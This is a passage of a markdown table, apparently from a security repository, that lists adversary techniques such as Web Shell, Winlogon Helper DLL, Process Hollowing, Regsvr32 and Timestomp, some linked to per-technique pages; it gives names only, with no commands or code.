| Shortcut Modification | | Process Hollowing | | | | | | | |
|
||||||
|
| System Firmware | | Redundant Access | | | | | | | |
|
||||||
|
| Valid Accounts | | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | | | | | | | |
|
||||||
|
| Web Shell | | [Regsvr32](Execution/Regsvr32.md) | | | | | | | |
|
||||||
|
| [Windows Management Instrumentation Event Subscription](Persistence/Windows_Management_Instrumentation_Event_Subscription.md) | | Rootkit | | | | | | | |
|
||||||
|
| Winlogon Helper DLL | | Rundll32 | | | | | | | |
|
||||||
|
| | | Scripting | | | | | | | |
|
||||||
|
| | | Software Packing | | | | | | | |
|
||||||
|
| | | Timestomp | | | | | | | |
|
||||||
|
| | | [Trusted Developer Utilities](Execution/Trusted_Developer_Utilities.md) | | | | | | | |
|
||||||
|
| | | Valid Accounts | | | | | | | |
|
Loading…
Reference in New Issue